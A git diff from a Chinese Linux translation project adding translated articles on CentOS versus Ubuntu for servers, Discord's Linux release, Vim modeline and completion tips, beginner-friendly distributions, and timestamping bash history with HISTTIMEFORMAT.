+![](http://1.gravatar.com/avatar/4e444ab611c7b8c7bcb76e58d2e82ae0?s=128&d=blank&r=g) + +译者简介:[GHLandy](http://GHLandy.com) —— 欲得之,则为之奋斗 (If you want it, work for it.)。 + +![GHLandy](http://GHLandy.com/images/GHLandy.ico) + +--------------------------------------------------------------------- + +via: http://www.tecmint.com/sudoers-configurations-for-setting-sudo-in-linux/ + +作者:[Aaron Kili][a] +译者:[GHLandy](https://github.com/GHLandy) +校对:[wxy](https://github.com/wxy) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://www.tecmint.com/author/aaronkili/ +[1]:http://www.tecmint.com/add-users-in-linux/ +[2]:http://www.tecmint.com/su-vs-sudo-and-how-to-configure-sudo-in-linux/ +[3]:http://www.tecmint.com/wp-content/uploads/2017/01/Create-Sudo-Log-File.png +[4]:http://www.tecmint.com/wp-content/uploads/2017/01/Log-sudo-Input-Output.png +[5]:http://www.tecmint.com/13-basic-cat-command-examples-in-linux/ +[6]:http://www.tecmint.com/wp-content/uploads/2017/01/Lecture-Sudo-Users.png +[7]:http://www.tecmint.com/wp-content/uploads/2017/01/Increase-Sudo-Password-Attempts.png +[8]:http://www.tecmint.com/wp-content/uploads/2017/01/Sudo-Insult-Message.png +[9]:http://www.tecmint.com/su-vs-sudo-and-how-to-configure-sudo-in-linux/ +[10]:http://www.tecmint.com/tag/linux-tricks/ diff --git a/published/201701/20170109 CentOS vs Ubuntu: Which one is better for a server.md b/published/201701/20170109 CentOS vs Ubuntu: Which one is better for a server.md new file mode 100644 index 0000000000..2536be20ba --- /dev/null +++ b/published/201701/20170109 CentOS vs Ubuntu: Which one is better for a server.md @@ -0,0 +1,86 @@ +CentOS 与 Ubuntu:哪个更适合做服务器? +============================================================ + +![](https://thishosting.rocks/wp-content/uploads/2017/01/centos-vs-ubuntu.jpg.webp) + +已经决定买一台虚拟服务器,但还不能决定使用哪个 Linux 发行版?我们都经历过这种困扰。对于 Linux 发行版来说,要在这么多的发行版和种种支流(flavors)中选择一个,那简直能让人崩溃。不过,对于服务器而言,有两个主流的 Linux 发行版,那就是 CentOS 和 Ubuntu。但如何从这两个之中选择,这是摆在管理员、初学者和专业人士面前的主要问题。在对这两个(和更多)发行版有了一定的经验之后,我们决定对这两个发行版用于服务器时做个比较。 + +### 概览 + +| ![CentOS](https://thishosting.rocks/wp-content/uploads/2017/01/centos-logo-50.png.webp) CentOS | ![Ubuntu](https://thishosting.rocks/wp-content/uploads/2017/01/ubuntu-logo-50.png.webp) Ubuntu | +| --- | --- | +| 基于 Red Hat Linux Enterprise | 基于 Debian | +| 更新频度较少 | 经常更新 | +| 更稳定和更安全一些,因为不经常更新。 | 更新的软件包可能不稳定,不安全?不会,因为他们在发布到正式版本前进行了大量测试。 | +| 没有足够的教程和用户群较少(LCTT 译注:可能是由于国内外情况不同,在国内,相对 Ubuntu 来说,人们更喜欢用 CentOS 做服务器) | 丰富的文档,活跃的社区和大量的在线教程| +| 对初学者困难,因为基于 Red Hat 桌面发行版不流行 | 更容易为已经熟悉桌面版 Ubuntu 的初学者使用| +| 支持 cPanel | 不支持 cPanel | +| .rpm 软件包和 “yum” 软件包管理器 | .deb 软件包和 “apt-get” 软件包管理器 | +| 在 [DigitalOcean][1] 免费试用 CentOS 服务器 | 在[DigitalOcean][2] 免费试用 Ubuntu 服务器 | + +### 哪个更适合新手? + +Ubuntu。 + +一如往常那样,它主要取决于你的需求和以前的经验,但一般来说,Ubuntu 对于初学者来说是更好的选择。主要是因为这两个原因: + +* Ubuntu 有一个庞大的社区,随时可以免费提供帮助。我指的是真正的大。数以千计的用户分布在数百个不同的在线论坛和兴趣组内。甚至有现实生活中的大会。你也可以为 CentOS 找到很多教程和帮助,特别是对于简单的 LAMP 栈和流行的应用程序而言。 +* Ubuntu 服务器对于以前使用过 Ubuntu 桌面的人来说会容易得多。同样的情况也存在于 CentOS 和 Fedora 之间,但是 Ubuntu 桌面版比任何其他基于 Linux 的家用桌面更受欢迎。 + +所以,如果你是一个初学者,而且没有任何特殊要求,那就去使用 Ubuntu 服务器。 更好的是,你可以从一个[便宜的托管服务提供商][4]那购买服务,这样你就可以在你的服务器上进行实验,还有一个[专业的 24/7 支持团队][7]准备好帮助你。 + +### 哪个更适合商用? + +CentOS。 + +同样,你仍然可以使用 Ubuntu 作为商用网站或公司内部服务器,但 CentOS 有它的优势: + +* CentOS(可以说)更稳定以及更安全。由于 CentOS 的更新频率较低,这意味着软件测试的时间更长,并且只有真正稳定的版本才会得到发布。如果你使用 CentOS,你不会因新的有 bug 的应用程序版本而遇到任何稳定性问题,因为你不会得到那个新的有 bug 的版本。 +* 大多数控制面板(包括最受欢迎的控制面板 - cPanel)仅支持 CentOS。所以这意味着如果你是一个网站托管公司,或者如果你是一个有很多客户的网站服务代理商,并且需要一个控制面板 - CentOS 是一个更好的选择。 + +### 尝试一下它们并选择一个 + +如果你还是不能决定,你可以免费试试它们。你可以在本地安装或使用 live 镜像。你还可以从 [Vultr][6] 和 [DigitalOcean][7] 这样的地方买到便宜的 VPS($5/月)。你可以在几秒钟内启动 CentOS/Ubuntu 服务器。当你通过推广链接(如我们的)注册,你可能会得到免费金额 - 这意味着你会真的可以免费试用。 + +### 哪个更快? + +它们在速度方面是相同的。它们和运行在你自己的硬件上一样快。它们将如你配置的一样快。不管怎样,你都应该正确配置并且保护所有的服务器、配置和应用程序。 + +你会使用哪个发行版?想告诉我们你是哪个发行版的拥趸么?请随时留下评论。 + +-------------------------------------------------------------------------------- + +**文末评论** + +W. Anderson: + +> 我的大多数 Linux 服务器部署都是针对企业客户的,所以我对文章作者以 GUI 客户端版本来反映任何服务器的管理功能感到困惑。通常,许多服务提供商也会在 CentOS、Ubuntu,或经常部署的 OpenSuse Leap 和 FreeBSD 10+ 服务器操作系统上提供 WebMin、VirtualAdmin 或类似工具作为控制面板,即使是在虚拟专用服务器(VPS)环境中。 + +> CentOS 在许多商业应用以及高级网络/虚拟化和云计算环境方面具有明显优于 Ubuntu 的优势,并且 CentOS 充分利用 SELinux 框架用于加强的安全层,而目前在 Ubuntu 中则不可用(或不容易)。 + +> 这种类型的比较通常是多余的,因为几乎总是有特定的和细微的要求,和需要服务器实现的需求,这将决定哪个发行版具有更多的优势或用途 - 基于技术专家/托管公司的专业知识和广泛的经验。 + +VAN DER BEKEN: + +> 正确的比较应该是对 Debian 和 CentOS 进行比较。 + +> 以我的经验,我使用 CentOS 和 Debian 作为服务器,稍微偏爱 Debian 一点点,因为它的社区。 + +-------------------------------------------------------------------------------- + +via: https://thishosting.rocks/centos-vs-ubuntu-server/ + +作者:[W. Anderson][a] +译者:[geekpi](https://github.com/geekpi) +校对:[wxy](https://github.com/wxy) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://thishosting.rocks/centos-vs-ubuntu-server/ +[1]:https://thishosting.rocks/go/digitalocean/ +[2]:https://thishosting.rocks/go/digitalocean/ +[3]:https://thishosting.rocks/how-to-choose-web-hosting/ +[4]:https://thishosting.rocks/best-cheap-managed-vps/ +[5]:https://thishosting.rocks/support/ +[6]:https://thishosting.rocks/go/vultr/ +[7]:https://thishosting.rocks/go/digitalocean/ diff --git a/published/201701/20170111 It’s Time to Ditch Skype and TeamSpeak, Discord Launches Its App for Linux Users.md b/published/201701/20170111 It’s Time to Ditch Skype and TeamSpeak, Discord Launches Its App for Linux Users.md new file mode 100644 index 0000000000..6f9bbfe872 --- /dev/null +++ b/published/201701/20170111 It’s Time to Ditch Skype and TeamSpeak, Discord Launches Its App for Linux Users.md @@ -0,0 +1,32 @@ +是时候抛弃 Skype 和 TeamSpeak 了, Discord 为 Linux 用户发布了应用 +============================================================ + +### 程序已经在 Ubuntu Linux 和其他发行版上可用了 + +在 2016 年 1 月 11 日发布的一则非常简短的声明中,[Discord][1] 公司发布了首个 Linux 平台的稳定版本,它是一款给玩家开发的流行、免费的、安全一体化的语音和文字聊天程序。 + +Linux 是他们补足全平台(桌面设备和移动设备)服务支持的缺失的一块。Discord 目前可用于 Android、iOS、Mac和 Windows,但你也可以使用兼容的网络浏览器直接在网络上使用它。 + +该应用程序似乎是微软 Skype VoIP 客户端,以及著名的 TeamSpeak 语音通信平台的直接竞争对手。它提供了广泛的功能,包括 IP 和 DDoS 保护,游戏内叠加,智能推送通知,单独音量控制,支持多个通道和现代化的文字聊天。 + +Discord 其他值得注意的功能包括支持编解码器、权限和自定义键盘快捷键、直接消息系统和朋友列表。它还承诺尽可能减少 CPU 使用率,为音频和自动故障转移功能提供低延迟支持。 + +### 在 Ubuntu 上安装 Discord + +官方 Discord 的第一个 Linux 稳定版本(版本 0.0.1)目前以二进制软件包[提供][2],支持 Debian 和基于 Ubuntu 的发行版(例如 Ubuntu、Debian、Linux Mint 等)。但是要安装它,你需要一个 64位系统。 + +如果你没有运行一个基于 Debian 或 Ubuntu 的操作系统,还有一个源码 tarball 可供下载,但你必须自行编译它。目前 Discord 0.0.1 已经进入 Arch Linux AUR 仓库了,并且很快也会到 Solus 中。其他发行版可能在未来几周内向其仓库添加 Discord。 + +-------------------------------------------------------------------------------- + +via: http://news.softpedia.com/news/it-s-time-to-ditch-skype-and-teamspeak-discord-launches-its-app-for-linux-users-511753.shtml + +作者:[Marius Nestor][a] +译者:[geekpi](https://github.com/geekpi) +校对:[wxy](https://github.com/wxy) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://news.softpedia.com/editors/browse/marius-nestor +[1]:https://discordapp.com/ +[2]:https://discordapp.com/download diff --git a/translated/tech/20170112 3 Useful VIM Editor Tips and Tricks for Advanced Users - part 3.md b/published/201701/20170112 3 Useful VIM Editor Tips and Tricks for Advanced Users - part 3.md similarity index 62% rename from translated/tech/20170112 3 Useful VIM Editor Tips and Tricks for Advanced Users - part 3.md rename to published/201701/20170112 3 Useful VIM Editor Tips and Tricks for Advanced Users - part 3.md index 6a41d2ba29..1e3831647c 100644 --- a/translated/tech/20170112 3 Useful VIM Editor Tips and Tricks for Advanced Users - part 3.md +++ b/published/201701/20170112 3 Useful VIM Editor Tips and Tricks for Advanced Users - part 3.md @@ -10,8 +10,7 @@ * [5 个针对有经验用户的 Vim 技巧][4] * 3 个针对高级用户的 Vim 编辑器实用技巧 -毫无疑问, Vim 是一个很强大的文本编辑器。它提供了大量的特性,这意味着学习并记住 Vim 的所有功能实际上是不可能的。但是我们至少可以 -不断学习简单的方法来完成事情,从而随着时间的增长,我们使用编辑器的经验将会变得更好。 +毫无疑问, Vim 是一个很强大的文本编辑器。它提供了大量的特性,这意味着学习并记住 Vim 的所有功能实际上是不可能的。但是我们至少可以不断学习简单的方法来完成事情,从而随着时间的增长,我们使用编辑器的经验将会变得更好。 请记住,在这篇文章中我们将讨论的一些 Vim 编辑器技巧是针对高级用户的。 @@ -19,37 +18,37 @@ 请注意文中提到的所有技巧绝大多数都是在简单、易于理解的代码环境中进行阐述的,因为它们在软件开发中确实很实用。但这并不意味着普通用户(非程序员、没有把 Vim 作为一般的文本编辑器)在他们的工作中用不到。 -### 1\.为文件设置特殊变量 +### 1、为文件设置特定的变量 -有时候,在一个特殊文件中,你可能想把输入的某个字母用空格代替,或者想把一个源代码文件使用两个空格缩进,而编辑器的默认缩进是四个空格。 +有时候,在一个特定文件中,你可能想把输入的制表符用空格代替,或者想要把源代码文件使用两个空格缩进,即便编辑器的默认缩进是四个空格。 -我们在这儿基本讨论对特殊文件进行的更改。 Vim 提供了一个特性允许你对一个特殊的文件更改特定的设置。这个特性叫做 “Modeline” 。 +基本上我们在这儿讨论对针对文件的的更改。 Vim 提供的这个特性允许你对一个指定的文件更改特定的设置。这个特性叫做 “模式行(Modeline)” 。 -比如,如果你想把输入的每一个制表符 (Tab) 用空格代替,那么你需要做的就是考虑在文件的前几行或最后几行加入下面的 ‘modeline’ : +比如,如果你想把输入的每一个制表符(Tab)用空格代替,那么你只需要在文件的前几行或最后几行加入下面的模式行: ``` # vim: set expandtab: ``` -如果想把默认缩进从 4 个空格变成 2 个空格,可以在源文件中添加下面的 ‘modeline’ : +如果想把默认缩进从 4 个空格变成 2 个空格,可以在源文件中添加下面的模式行: ``` // vim: noai:ts=2:sw=2 ``` -在使用 ‘modeline’ 时,请记住下面这几个重要的点: +在使用模式行时,请记住下面这几个重要的点: -* ‘Modeline’ 只能添加在文件中的前五行或者最后五行。 -* 为了使用 “modeline” 选项这个特性,必须在 “.vimrc” 文件中添加 ‘:set modeline’ 。 -* 在以 root 用户身份对文件进行编辑的时候该特性失效。 +* 模式行只能添加在文件中的前五行或者最后五行。 +* 为了使用模式行这个特性,必须在 `.vimrc` 文件中添加 `:set modeline` 。 +* 在以 root 用户身份对文件进行编辑的时候该特性失效。 -了解更多的信息,请阅读该特性的[官方文档][17] +了解更多的信息,请阅读该特性的[官方文档][17]。 -### 2\. 关键字补全 +### 2、 关键字补全 -当你开始写更多的复杂代码或者开始开发大量的源文件时,你需要设置一些变量名字。有时,要记住所有的变量名字不太容易,所以当需要输入变量名字的时候,你通常从已经使用过的地方复制过来。 +当你开始写的复杂代码越来越多或者开始在一个大的源文件上编辑时,你会遇到一些变量名字。有时,要记住所有的变量名字不太容易,所以当需要输入变量名字的时候,你通常从已经使用过的地方复制过来。 -幸运的是,使用 Vim 你只需要输入变量的几个起始字母即可。在’插入模式’中,按 “Ctrl + n” 或者 “Ctrl + p” 可以得到匹配关键词。 “Ctrl + n” 用来插入下一个匹配词; “Ctrl + p” 给出一系列过去的匹配词。 +幸运的是,使用 Vim 你只需要输入变量的几个起始字母即可。在’插入模式’中,按 `Ctrl + n` 或者 `Ctrl + p` 可以得到一个匹配的关键词列表。 `Ctrl + n` 用来插入下一个匹配词; `Ctrl + p` 给出一个之前匹配的关键词列表。 下图是该特性的一个展示: @@ -57,11 +56,11 @@ 正如上面的屏幕截图清晰展示的那样,列表中也会出现其他源文件中包含的词。关于该特性的更多信息,请访问[这儿][18]。 -### 3\. 搜索 +### 3、 搜索 -假设你正在调试代码,其中一部分需要做的工作是快速查看一个变量在一个文件中所有出现的地方。一个常用的方法是退出‘插入模式’,输入 ‘/[变量名字]’ 命令,按 ‘Press’ ,然后返回‘插入模式’,使用 “n” 和 “p” 关键字。 +假设你正在调试代码,其中一个需要做的工作是快速查看一个变量在一个文件中所有出现的地方。一个常用的方法是退出‘插入模式’,输入 `/[变量名字]` 命令,按回车 ,然后返回‘插入模式’,使用 `n` 和 `p` 在关键字之间导航。 -上面讲到的方法是挺好的,但是还有一种更简单、更快捷的方法可以来完成这样的搜索。使用这种方法,首先你需要退出‘插入模式’,然后把光标移动到你想要搜索的词/变量下面,这并不费时。接下来,你只需要按 “Shift + .” 即可。 +上面讲到的这种方法没毛病,但是还有一种更简单、更快捷的方法可以来完成这样的搜索。使用这种方法,首先你需要退出‘插入模式’,然后把光标移动到你想要搜索的词/变量下面,这并不费时。接下来,你只需要按 `Shift + *` 即可。 重复这样做,然后编辑器将会带你找到在文件中所有使用了这个词/变量的地方。 @@ -76,7 +75,7 @@ via: https://www.maketecheasier.com/vim-tips-tricks-advanced-users/ 作者:[Himanshu Arora][a] 译者:[ucasFL](https://github.com/ucasFL) -校对:[校对者ID](https://github.com/校对者ID) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 diff --git a/published/20170112 Let Sudo Insult You When You Enter Incorrect Password.md b/published/201701/20170112 Let Sudo Insult You When You Enter Incorrect Password.md similarity index 100% rename from published/20170112 Let Sudo Insult You When You Enter Incorrect Password.md rename to published/201701/20170112 Let Sudo Insult You When You Enter Incorrect Password.md diff --git a/published/201701/20170112 You Can Now Have a Single ISO Image with All the Essential Ubuntu 16.10 Flavors.md b/published/201701/20170112 You Can Now Have a Single ISO Image with All the Essential Ubuntu 16.10 Flavors.md new file mode 100644 index 0000000000..459755d5e8 --- /dev/null +++ b/published/201701/20170112 You Can Now Have a Single ISO Image with All the Essential Ubuntu 16.10 Flavors.md @@ -0,0 +1,31 @@ +你现在可以下载包含所有风味的 Ubuntu 16.10 的单独 ISO 镜像了 +====================================== +Linux AIO 开发商 Željko Popivoda 通知说可以下载 Linux AIO(All-in-One)Ubuntu 16.10 Live DVD 了,该 DVD 包含所有主要的 Ubuntu 16.10 风味(flavor)版本。 + +如果你梦想有一个可以写在 USB 或 DVD 光盘上的单独 ISO 镜像,然后在需要时启动某个 Ubuntu Linux 操作系统(如 Ubuntu、Kubuntu、Xubuntu、Lubuntu 或者 Ubuntu MATE),现在你就可以用 Linux AIO Ubuntu 16.10 做到了。 + +[Linux AIO][1] 团队以开发这种完全免费的多发行版 ISO 镜像而闻名,而 Linux AIO Ubuntu 16.10 有两个版本,分别用于 64 位和 32 位平台,里面有 Ubuntu 16.10、Kubuntu 16.10、Xubuntu 16.10、Lubuntu 16.10、Ubuntu MATE 16.10 和 Ubuntu GNOME 16.10。 + +这些都是未修改的官方发行版。Linux AIO 团队把它们都放在一个易于使用的单一容器中,例如,当你在客户那,你需要向他/她展示各种基于 Linux 的操作系统来选择,你就不必带来六个不同的 U 盘或 DVD 光盘。 + +### 包含了硬件和内存测试工具 + +两种 Linux AIO Ubuntu 16.10 都附带两个重要的实用程序,即 HDT(硬件检测工具),用于查看目标计算机上是否与各个同 Ubuntu 16.10 流派完全兼容,还有 Memtest86+,这是一个非常流行的命令行工具,用于测试系统内存错误并验证其完整性。 + +[Linux AIO Ubuntu 16.10 现在可以下载了][2],但请记住,由于托管文件的 SourceForge 服务器的存储限制,镜像被分为两个 .7z 存档,你需要下载并解压缩以获取可用的 ISO。 + +我们曾经被许多读者问过 Linux AIO Live DVD 是否支持 UEFI ,答案仍然是没有,但是团队正在努力实现未来对 UEFI 的支持。还请查看最近发布的 Linux AIO Ubuntu Mixture 2017.01。 + +-------------------------------------------------------------------------------- + +via: http://news.softpedia.com/news/you-can-now-have-a-single-iso-image-with-all-essential-ubuntu-16-10-flavors-exclusive-511788.shtml + +作者:[Marius Nestor][a] +译者:[geekpi](https://github.com/geekpi) +校对:[wxy](https://github.com/wxy) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://news.softpedia.com/editors/browse/marius-nestor +[1]:http://linuxaio.net/ +[2]:http://linux.softpedia.com/get/Linux-Distributions/Ubuntu-AIO-DVD-103429.shtml diff --git a/published/201701/20170113 Best Linux Distributions for New Users.md b/published/201701/20170113 Best Linux Distributions for New Users.md new file mode 100644 index 0000000000..134b9d38a2 --- /dev/null +++ b/published/201701/20170113 Best Linux Distributions for New Users.md @@ -0,0 +1,99 @@ +给 Linux 新手的最佳发行版 +============================================================ + + ![](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/distros-new-users.jpg?itok=Prp88H71) + +Jack Wallen 为来自不同环境的新手们挑选出专门为他们设计的发行版。[CC0][5]社区。 + +一个很古老的问题,找到适合的 Linux 发行版比简单的指出哪种 Linux 版本受欢迎更重要。为什么这么说? + +让我们设置一个情景:你有一位用户,很有可能,他过去大多数时候都是在 Windows 或者 Mac 系统上工作,他们想让你给他们一个选择的替代品。现在,你想要在很短的时间里直截了当的说明 Linux 系统的工作方式并突出它的强大性和灵活性。 + +但是,请记住,最重要的一个方面是他们必须能够 _get it_,即开箱即用。 + +这就是为什么我们经常需要花费时间来找出哪种版本是最适合新手的 -- 因为把新手们带入 Linux 系统是传播 Linux 并增加 Linux 用户的最好方式。 + +对于新手来说最好的版本是什么?这次,我将要花费一定时间来说明对于来自不同环境的用户哪种版本才是最适合的。此外,你也可以查看我在 [2017 最好的发行版][11]中列出的发行版。 + +### 从 Windows 7 到 Linux:ZorinOS + +当 Windows 8 发布以后,有一个理由让如此多的用户依然坚持使用 Windows 7, 那就是熟悉度。用户们已经在相同的桌面环境上工作了十几年,他们不想转移到 Windows 8 这种更以触摸屏为主的平台上。所以,你会去选择哪种版本呢?你首先必须要考虑的是桌面环境。为什么?因为这是你能够立刻吸引上这些 Windows 7 用户的地方。对于这个任务,还有什么版本会比 [ZorinOS][13] 更好呢? + +ZorinOS 就是专门作为 Windows 和 Mac 系统的替代品而设计的,所以它下了很大的功夫来模仿 Windows 和 Mac 桌面的外观和感觉。事实上,除了 ZorinOS 以外,你很难找到一个别的 Linux 版本,能够完美的从 Windows 7 转移到 Linux 系统上,同时保留 Linux 系统如此强大、灵活的平台。 + +除了桌面环境(图片 1)以外, 因为 ZorinOS 完全基于 Ubuntu 系统,所以在其“外表”下面, ZorinOS 和 Ubuntu 以同样的方式工作(所以基本不用去担心硬件不能够被检测到)。同时伴有已经就绪的软件,你便有了针对来自 Windows 7 用户的最完美的 Linux 版本。 + + ![ZorinOS](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/zorinos.jpg?itok=i970f1Id "ZorinOS") + +*图片 1:类 Windows 7 的 ZorinOS 桌面,准备开始服务。[使用许可][1]* + +请注意:然而, ZorinOS 有两个版本: Zorin Ultimate 和 Zorin Core 。 Zorin Core 是免费的,但它不包含几乎所有你能够在 Zorin Ultimate 中找到的软件。如果你想要一个适合于所有来自 Windows 7 用户的开箱即用的版本,那么我强烈推荐购买 [Zorin Ultimate][14](大约需要花费 20 美元)。当然,如果你不想花钱购买 Ultimate 版本,你也可以从 Core 版本包含的软件包管理工具中安装几乎所有你需要的东西。 + +### 从 Windows 8 到 Linux : Ubuntu GNOME + +让我们来看看 Windows 8, 它带来了一个以触摸屏为中心的环境,改变了用户与电脑互动的方式。老式的启动菜单、面板、系统托盘桌面已经被触摸屏环境界面所取代。如果你正在找一个能给 Linux 新手们带来不同体验的最好环境,同时功能也要是最好的,那么没有比 [Ubuntu GNOME][16] 更合适的了。 + +Ubuntu GNOME 是 Ubuntu 和 GNOME(图 2)这两个世界之间最好的融合。用一个现代、优雅、简洁并且用户友好的桌面代替了 Unity 界面, 因此 Ubuntu GNOME 不会给任何来自 Windows 8 的用户造成太多的麻烦。该版本不仅基于最新的长期支持版的 Ubuntu 发行版(支持期会很长),同时使用了 GNOME 桌面的最新稳定版本 - 这意味着用户将能够享受到难以置信的稳定体验。 + + ![Ubuntu GNOME](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/ubuntugnome.jpg?itok=SNjA3y7T "Ubuntu GNOME") + +*图片 2 :在 Ubuntu GNOME 中可以发现,在优雅而又简洁。 [使用许可][2]* + +### 从 Mac 到 Linux : Elementary OS + +毫无疑问,这一场的绝对赢家是 [Elementary OS][17]。尽管 Elementary OS 在外观和感觉上所达到的效果和 OS X 桌面非常相似,但实际还有更多优秀的地方。 Elementary OS 同样是基于 Linux 系统的,只不过是它采取了很多 Mac X 桌面的设计元素。 + +任何的 Mac 用户使用 Elementary OS 的桌面环境(图片 3)都会感觉就像是“在家一样”(使用 Mac 一样)。伴有如此熟悉的文档,同时包含一个熟悉的应用菜单, Elementary OS 总是位于我的‘最佳发行版列表’的顶部。如果我们正在和 Mac 用户讨论迁移,那么没有比 Elementary OS 更好的 Mac 替代品了。 + + ![Elementary OS](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/elementaryos.jpg?itok=qaXRClRM "Elementary OS") + +*图片 3 :Elementary OS 桌面的荣耀。[使用许可][3]* + +有一件事情 Mac 用户们将会非常感激,那就是 Elementary OS 的开发者们很好的保持了桌面的一致性。从 dock, 到面板、菜单、到包括的应用,你找不到任何一个看起来或感觉没有归属感的单一元素。 + +我将在这儿说一个关于 Elementary OS 的预警。你需要安装一个好的浏览器(因为它自带安装的 Epiphany-a 浏览器没有得到许多常用站点的支持),同时,你需要从官方的 [LibreOffice 网站][18]下载安装包来安装 LibreOffice (因为在 Elementary OS 的软件中心找到的安装包已经有些过时了)。 + +### 从 Android 到 Linux:Ubuntu + +这似乎有点像是一个延伸话题,但考虑到 Android 在全球市场中占主导地位,所以你可能遇到一个来自以移动设备为中心的用户,他可能需要一个 Linux 桌面,从而让他一直感觉像是‘在家’一样。对于我来说, [Ubuntu][19] 是最显然的赢家。为什么?和其他系统相比, Ubuntu Unity 在桌面上做出了很杰出的工作,它使得桌面感觉像是一个包罗万象的界面。如果你愿意,那么可以包含在线搜索结果(默认情况下禁用),这是在几乎每个移动环境中均可找到的东西。同样, Unity HUD 菜单系统(图片 4)是在任何界面系统中所能找到的最独一无二的菜单系统之一。通过 Unity HUD 菜单系统,用户可以更少的依赖鼠标(就像他们过去在 Android 支持的移动设备上工作一样)。 + + ![Ubuntu Unity](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/ubuntu.jpg?itok=HsvBJAIN "Ubuntu Unity") + +*图片 4: 使用中的 Unity HUD 。[使用许可][4]* + +当然, Ubuntu 也提供了市场上最稳定的桌面平台,所以用户体验近乎完美。 + +### 总有一款 Linux 发行版适合你 + +有一件很重要的事情需要记住,那就是总有一款 Linux 发行版适合你。但是对于那些来自特殊环境的人,我强烈推荐找到一个最喜爱的 Linux 版本,从而能够帮助他们无缝过渡。给自己一个机会尝试一下,看看你是否可以轻松体验到开源和 Linux 的强大。 + +-------------------------------------------------------------------------------- + +via: https://www.linux.com/news/best-linux-distributions-new-users + +作者:[JACK WALLEN][a] +译者:[ucasFL](https://github.com/ucasFL) +校对:[wxy](https://github.com/wxy) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.linux.com/users/jlwallen +[1]:https://www.linux.com/licenses/category/used-permission +[2]:https://www.linux.com/licenses/category/used-permission +[3]:https://www.linux.com/licenses/category/used-permission +[4]:https://www.linux.com/licenses/category/used-permission +[5]:https://www.linux.com/licenses/category/creative-commons-zero +[6]:https://www.linux.com/files/images/zorinosjpg +[7]:https://www.linux.com/files/images/ubuntugnomejpg +[8]:https://www.linux.com/files/images/elementaryosjpg-1 +[9]:https://www.linux.com/files/images/ubuntujpg +[10]:https://www.linux.com/files/images/distros-new-usersjpg +[11]:https://www.linux.com/news/learn/sysadmin/best-linux-distributions-2017 +[12]:http://bit.ly/2jJgK0Q +[13]:https://zorinos.com/ +[14]:https://zorinos.com/download/#ultimate +[15]:https://training.linuxfoundation.org/certification/lfcs?utm_source=linux-inline-ad&utm_campaign=new-users-2017&utm_medium=online-advertising&utm_content=new-year +[16]:https://ubuntugnome.org/ +[17]:https://elementary.io/ +[18]:http://www.libreoffice.org/download/libreoffice-fresh/ +[19]:https://www.ubuntu.com/ diff --git a/published/20170113 Learn The Basics of How Linux IO Redirection Works.md b/published/201701/20170113 Learn The Basics of How Linux IO Redirection Works.md similarity index 100% rename from published/20170113 Learn The Basics of How Linux IO Redirection Works.md rename to published/201701/20170113 Learn The Basics of How Linux IO Redirection Works.md diff --git a/published/201701/20170114 Set Date and Time for Each Command You Execute in Bash History.md b/published/201701/20170114 Set Date and Time for Each Command You Execute in Bash History.md new file mode 100644 index 0000000000..26081ae73b --- /dev/null +++ b/published/201701/20170114 Set Date and Time for Each Command You Execute in Bash History.md @@ -0,0 +1,97 @@ +为你在 Bash 历史中执行过的每一项命令设置时间和日期 +============================================================ + +在默认情况下,所有通过 Bash 在命令行中执行过的命令都被存储在历史缓存区或者一个叫做 `~/.bash_history` 的文件里。这意味着系统管理员可以看到系统上用户执行过的命令清单,或者用户可以通过像 [history 命令][1]这样的选项来看他或她自己的命令历史。 +``` +$ history +``` +[ + ![Linux History Command](http://www.tecmint.com/wp-content/uploads/2017/01/Linux-History-Command.png) +][2] + +*Linux 历史命令* + +从上面 [history 命令][3]的输出可知,命令被执行的日期和时间并没有显示出来。基本上所有的 Linux 发行版的默认设置都是这样的。 + +在这篇文章里,我们将解释当在 Bash 中执行 `history` 命令显示每个命令时,如何配置显示时间戳信息。 + +每个命令相关的日期和时间可以记录到历史文件中,用 `HISTTIMEFORMAT` 环境变量的设置作为命令历史的备注记录。 + +这里有两种可行的方式来达到目的:一种是暂时的效果,一种是永久的效果。 + +要临时设置 `HISTTIMEFORMAT` 环境变量,在命令行这样输出它: + +``` +$ export HISTTIMEFORMAT='%F %T' +``` + +在上面的输出命令当中,时间戳格式如下: + +1、`%F`-展开为完整日期,即 `%Y-%m-%d`(年-月-日)。 + +2、`%T`-展开为时间,即 `%H:%M:%S`(时:分:秒)。 + +通读 [date 命令][4]的 man 手册来获得更多使用说明: + +``` +$ man date +``` + +然后如下检查你的命令历史: + +``` +$ history +``` +[ + ![Display Linux Command History with Date and Time](http://www.tecmint.com/wp-content/uploads/2017/01/Set-Date-and-Time-on-Linux-Commands-History.png) +][5] + +*显示带有日期和时间的 Linux 命令历史。* + +(LCTT 译注:注意:这个功能只能用在当 HISTTIMEFORMAT 这个环境变量被设置之后,之后的那些新执行的 bash 命令才会被打上正确的时间戳。在此之前的所有命令,都将会显示成设置 HISTTIMEFORMAT 变量的时间。) + +然而,如果你想永久地配置该变量,用你最喜欢的编辑器打开文件 `~/.bashrc`。 + +``` +$ vi ~/.bashrc +``` + +然后在下方添加(用注释将其标记为你自己的配置): + +``` +# 我的配置 +export HISTTIMEFORMAT='%F %T' +``` + +保存文件并退出,然后,运行下面的命令以便改动当即生效: + +``` +$ source ~/.bashrc +``` + +就是这些!请通过下方的评论区来与我们分享一些有趣的历史命令的小技巧以及你对这篇文章的想法。 + +-------------------------------------------------------------------------------- + +作者简介: + +![](http://1.gravatar.com/avatar/7badddbc53297b2e8ed7011cf45df0c0?s=128&d=blank&r=g) + +我是 Ravi Saive,TecMint 的创建者。一个爱在网上分享的技巧和提示的电脑极客和 Linux 专家。我的大多数服务器运行在名为 Linux 的开源平台上。请在 Twitter、 